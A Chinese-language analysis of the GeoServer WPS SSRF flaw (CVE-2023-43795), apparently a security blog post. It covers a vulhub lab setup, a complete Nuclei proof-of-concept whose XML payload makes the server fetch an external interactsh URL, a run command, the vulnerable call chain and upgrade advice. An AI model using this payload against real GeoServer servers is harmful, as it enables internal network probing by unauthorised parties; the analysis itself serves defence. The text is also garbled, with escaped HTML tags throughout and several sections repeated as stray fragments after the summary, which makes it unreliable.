GeoServer SSRF漏洞分析报告 (CVE-2023-43795)<\/h1>

0x00 漏洞概述<\/h2>

GeoServer是一个用Java编写的开源软件服务器，允许用户共享和编辑地理空间数据。该软件遵循OpenGIS Web服务器规范，使用开放标准发布来自任何主要空间数据源的数据。<\/p>

漏洞类型<\/strong>：服务器端请求伪造(SSRF)
漏洞编号<\/strong>：CVE-2023-43795
厂商官网<\/strong>：https:\/\/geoserver.org\/
影响对象类型<\/strong>：Web应用
影响产品<\/strong>：GeoServer
影响版本<\/strong>：<\/p>

version < 2.22.5<\/li>
version < 2.23.2
必要条件<\/strong>：需要安装WPS插件<\/li> <\/ul>
0x01 漏洞影响<\/h2>
官方安全公告：
https:\/\/github.com\/geoserver\/geoserver\/security\/advisories\/GHSA-5pr3-m5hm-9956<\/p>
0x02 漏洞环境搭建<\/h2>
基于vulhub的GeoServer漏洞环境进行搭建，需要额外安装WPS插件：<\/p>

基础环境：使用vulhub\/geoserver:2.22.1镜像<\/li>
WPS插件下载地址：
https:\/\/sourceforge.net\/projects\/geoserver\/files\/GeoServer\/2.22.1\/extensions\/geoserver-2.22.1-wps-plugin.zip\/download<\/li>
修改docker-compose.yml文件，添加WPS插件相关JAR包挂载<\/li> <\/ol>
docker-compose.yml示例<\/strong>：<\/p>
version<\/span>: '3'<\/span> <\/span><\/span>services<\/span>: <\/span><\/span> web<\/span>: <\/span><\/span> image<\/span>: vulhub\/geoserver:2.22.1<\/span> <\/span><\/span> depends_on<\/span>: <\/span><\/span> - postgres<\/span> <\/span><\/span> ports<\/span>: <\/span><\/span> - "8080:8080"<\/span> <\/span><\/span> - "5005:5005"<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - .\/startup.sh:\/startup.sh<\/span> <\/span><\/span> - .\/startup2.sh:\/mnt\/geoserver\/bin\/startup.sh<\/span> <\/span><\/span> - .\/gs-web-wps-2.22.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gs-web-wps-2.22.1.jar<\/span> <\/span><\/span> - .\/gs-wps-core-2.22.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gs-wps-core-2.22.1.jar<\/span> <\/span><\/span> - .\/gs-wps-kml-ppio-2.22.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gs-wps-kml-ppio-2.22.1.jar<\/span> <\/span><\/span> - .\/gt-csv-28.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gt-csv-28.1.jar<\/span> <\/span><\/span> - .\/gt-process-geometry-28.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gt-process-geometry-28.1.jar<\/span> <\/span><\/span> - .\/gt-xsd-kml-28.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gt-xsd-kml-28.1.jar<\/span> <\/span><\/span> - .\/gt-xsd-wps-28.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/gt-xsd-wps-28.1.jar<\/span> <\/span><\/span> - .\/net.opengis.wps-28.1.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/net.opengis.wps-28.1.jar<\/span> <\/span><\/span> - .\/opencsv-5.0.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/opencsv-5.0.jar<\/span> <\/span><\/span> - .\/serializer-2.7.2.jar:\/mnt\/geoserver\/webapps\/geoserver\/WEB-INF\/lib\/serializer-2.7.2.jar<\/span> <\/span><\/span> command<\/span>: bash \/startup.sh<\/span> <\/span><\/span> postgres<\/span>: <\/span><\/span> image<\/span>: postgis\/postgis:14-3.3-alpine<\/span> <\/span><\/span> environment<\/span>: <\/span><\/span> - POSTGRES_PASSWORD=vulhub<\/span> <\/span><\/span> - POSTGRES_DB=geoserver<\/span> <\/span><\/span><\/code><\/pre>调试配置<\/strong>：修改容器中的\/mnt\/geoserver\/bin\/startup.sh<\/code>文件，添加调试参数：<\/p> -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 <\/code><\/pre> 0x03 漏洞验证与利用<\/h2> 验证方法<\/h3> 使用Nuclei工具进行验证，POC如下：<\/p> id<\/span>: CVE-2023-43795<\/span> <\/span><\/span> <\/span><\/span>info<\/span>: <\/span><\/span> name<\/span>: GeoServer WPS - Server Side Request Forgery<\/span> <\/span><\/span> author<\/span>: DhiyaneshDK<\/span> <\/span><\/span> severity<\/span>: critical<\/span> <\/span><\/span> description<\/span>: | <\/span><\/span><\/span> <\/span> GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.<\/span> <\/span><\/span>variables<\/span>: <\/span><\/span> string<\/span>: "{{to_lower(rand_text_alpha(4))}}"<\/span> <\/span><\/span> value<\/span>: "{{to_lower(rand_text_alpha(5))}}"<\/span> <\/span><\/span> <\/span><\/span>http<\/span>: <\/span><\/span> - raw<\/span>: <\/span><\/span> - | <\/span><\/span><\/span> POST {{path}} HTTP\/1.1 <\/span><\/span><\/span> Host: {{Hostname}} <\/span><\/span><\/span> Content-Type: application\/xml <\/span><\/span><\/span> <\/span><\/span><\/span> <?xml version="1.0" encoding="UTF-8"?> <\/span><\/span><\/span> <wps:Execute version="1.0.0" service="WPS" <\/span><\/span><\/span> xmlns:xsi="http:\/\/www.w3.org\/2001\/XMLSchema-instance" <\/span><\/span><\/span> xmlns="http:\/\/www.opengis.net\/wps\/1.0.0" <\/span><\/span><\/span> xmlns:wfs="http:\/\/www.opengis.net\/wfs" <\/span><\/span><\/span> xmlns:wps="http:\/\/www.opengis.net\/wps\/1.0.0" <\/span><\/span><\/span> xmlns:ows="http:\/\/www.opengis.net\/ows\/1.1" <\/span><\/span><\/span> xmlns:gml="http:\/\/www.opengis.net\/gml" <\/span><\/span><\/span> xmlns:ogc="http:\/\/www.opengis.net\/ogc" <\/span><\/span><\/span> xmlns:wcs="http:\/\/www.opengis.net\/wcs\/1.1.1" <\/span><\/span><\/span> xmlns:xlink="http:\/\/www.w3.org\/1999\/xlink" <\/span><\/span><\/span> xsi:schemaLocation="http:\/\/www.opengis.net\/wps\/1.0.0 http:\/\/schemas.opengis.net\/wps\/1.0.0\/wpsAll.xsd"> <\/span><\/span><\/span> <ows:Identifier>JTS:area<\/ows:Identifier> <\/span><\/span><\/span> <wps:DataInputs> <\/span><\/span><\/span> <wps:Input> <\/span><\/span><\/span> <ows:Identifier>geom<\/ows:Identifier> <\/span><\/span><\/span> <wps:Reference mimeType="application\/json" xlink:href="http:\/\/{{interactsh-url}}" method="GET"> <\/span><\/span><\/span> <wps:Header key="{{string}}" value="{{value}}"\/> <\/span><\/span><\/span> <\/wps:Reference> <\/span><\/span><\/span> <\/wps:Input> <\/span><\/span><\/span> <\/wps:DataInputs> <\/span><\/span><\/span> <wps:ResponseForm> <\/span><\/span><\/span> <wps:RawDataOutput> <\/span><\/span><\/span> <ows:Identifier>result<\/ows:Identifier> <\/span><\/span><\/span> <\/wps:RawDataOutput> <\/span><\/span><\/span> <\/wps:ResponseForm> <\/span><\/span><\/span> <\/wps:Execute><\/span> <\/span><\/span> <\/span><\/span> payloads<\/span>: <\/span><\/span> path<\/span>: <\/span><\/span> - \/wms<\/span> <\/span><\/span> - \/geoserver\/wms<\/span> <\/span><\/span> <\/span><\/span> stop-at-first-match<\/span>: true<\/span> <\/span><\/span> matchers<\/span>: <\/span><\/span> - type<\/span>: dsl<\/span> <\/span><\/span> dsl<\/span>: <\/span><\/span> - contains(interactsh_protocol, 'http')<\/span> <\/span><\/span> - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')<\/span> <\/span><\/span> - status_code == 200<\/span> <\/span><\/span> condition<\/span>: and<\/span> <\/span><\/span><\/code><\/pre>执行命令：<\/p> nuclei.exe -t CVE-2023-43795.yaml -u http:\/\/192.168.88.132:8080\/ <\/code><\/pre> 漏洞利用原理<\/h3> 攻击者通过构造恶意的WPS请求，利用wps:Reference<\/code>标签的xlink:href<\/code>属性指定外部URL，GeoServer会向该URL发起请求，从而实现SSRF攻击。<\/p> 0x04 漏洞分析<\/h2> 漏洞调用链<\/h3> 请求首先到达org.geoserver.ows.Dispatcher<\/code>的service()<\/code>方法<\/li> 调用this.findService()<\/code>确定要调用的service<\/li> 调用this.execute()<\/code>执行请求<\/li> 进入org.geoserver.wps.DefaultWebProcessingService<\/code>的execute()<\/code>方法<\/li> 由executionManager<\/code>负责处理request<\/li> 最终调用WPSExecutionManager$Executor<\/code>对象的call()<\/code>方法<\/li> 触发org.apache.http.impl.client.CloseableHttpClient.execute()<\/code>实现SSRF<\/li> <\/ol> 关键代码分析<\/h3> 漏洞核心在于GeoServer处理WPS请求时，未对wps:Reference<\/code>中的URL进行有效验证和限制，导致可以构造任意HTTP请求。<\/p> 0x05 漏洞修复<\/h2> 修复方案<\/strong>：<\/p> 升级到安全版本： version >= 2.22.5<\/li> version >= 2.23.2<\/li> <\/ul> <\/li> <\/ol> 修复建议<\/strong>：<\/p> 及时更新GeoServer到最新安全版本<\/li> 如无法立即升级，可考虑临时禁用WPS功能<\/li> 在网络层面限制GeoServer服务器的出站连接<\/li> <\/ol> 0x06 总结<\/h2> CVE-2023-43795是一个存在于GeoServer中的SSRF漏洞，攻击者可以利用该漏洞从服务端发起任意HTTP请求，可能导致内网探测、服务端请求伪造等风险。该漏洞需要安装WPS插件才能利用，建议用户及时升级到修复版本或采取适当的缓解措施。<\/p>

GeoServer SSRF漏洞分析报告 (CVE-2023-43795)<\/h1>

0x01 漏洞影响<\/h2>
官方安全公告：
https:\/\/github.com\/geoserver\/geoserver\/security\/advisories\/GHSA-5pr3-m5hm-9956<\/p>

0x03 漏洞验证与利用<\/h2>

漏洞利用原理<\/h3>
攻击者通过构造恶意的WPS请求，利用`wps:Reference<\/code>标签的xlink:href<\/code>属性指定外部URL，GeoServer会向该URL发起请求，从而实现SSRF攻击。<\/p>`

关键代码分析<\/h3>
漏洞核心在于GeoServer处理WPS请求时，未对`wps:Reference<\/code>中的URL进行有效验证和限制，导致可以构造任意HTTP请求。<\/p>`

GeoServer SSRF漏洞分析报告 (CVE-2023-43795)<\/h1>

0x01 漏洞影响<\/h2> 官方安全公告： https:\/\/github.com\/geoserver\/geoserver\/security\/advisories\/GHSA-5pr3-m5hm-9956<\/p>

0x03 漏洞验证与利用<\/h2>

漏洞利用原理<\/h3> 攻击者通过构造恶意的WPS请求，利用wps:Reference<\/code>标签的xlink:href<\/code>属性指定外部URL，GeoServer会向该URL发起请求，从而实现SSRF攻击。<\/p>

关键代码分析<\/h3> 漏洞核心在于GeoServer处理WPS请求时，未对wps:Reference<\/code>中的URL进行有效验证和限制，导致可以构造任意HTTP请求。<\/p>

0x01 漏洞影响<\/h2>
官方安全公告：
https:\/\/github.com\/geoserver\/geoserver\/security\/advisories\/GHSA-5pr3-m5hm-9956<\/p>

漏洞利用原理<\/h3>
攻击者通过构造恶意的WPS请求，利用`wps:Reference<\/code>标签的xlink:href<\/code>属性指定外部URL，GeoServer会向该URL发起请求，从而实现SSRF攻击。<\/p>`

关键代码分析<\/h3>
漏洞核心在于GeoServer处理WPS请求时，未对`wps:Reference<\/code>中的URL进行有效验证和限制，导致可以构造任意HTTP请求。<\/p>`